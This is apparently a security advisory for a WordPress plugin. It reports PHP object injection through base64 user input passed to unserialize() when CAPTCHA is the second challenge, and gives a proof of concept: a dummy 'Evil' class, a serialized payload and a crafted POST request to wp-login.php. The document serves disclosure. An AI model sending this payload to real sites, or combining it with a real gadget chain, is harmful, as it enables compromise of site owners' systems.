The plugin passes base64 encoded user input to the unserialize() PHP function when CAPTCHA are used as second challenge, which could lead to PHP Object injection if a plugin installed on the blog has a suitable gadget chain
To simulate a gadget chain, put the following code in a plugin class Evil { public function __wakeup() : void { die("Arbitrary deserialization"); } } On a page where the request is blocked and the second challenge is set to a CAPTCHA (such as reCAPTCHA), send dummy data, intercept it and change the kp parameter with the following payload: Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:"Evil":0:{};) POST /wp-login.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 176 Connection: close Upgrade-Insecure-Requests: 1 kn=6dc52e6b54&ss_block=G&kp=Tzo0OiJFdmlsIjowOnt9Ow%3D%3D&kr=Allow+List+Email%3A+block%40email.com&ka=block%40email.com&ke=cwenf&km=cc&recaptcha=recaptcha&g-recaptcha-response=
Seryeon Ham
Seryeon Ham
Yes
2022-12-05 (about 9 months ago)
2022-12-05 (about 9 months ago)
2022-12-05 (about 9 months ago)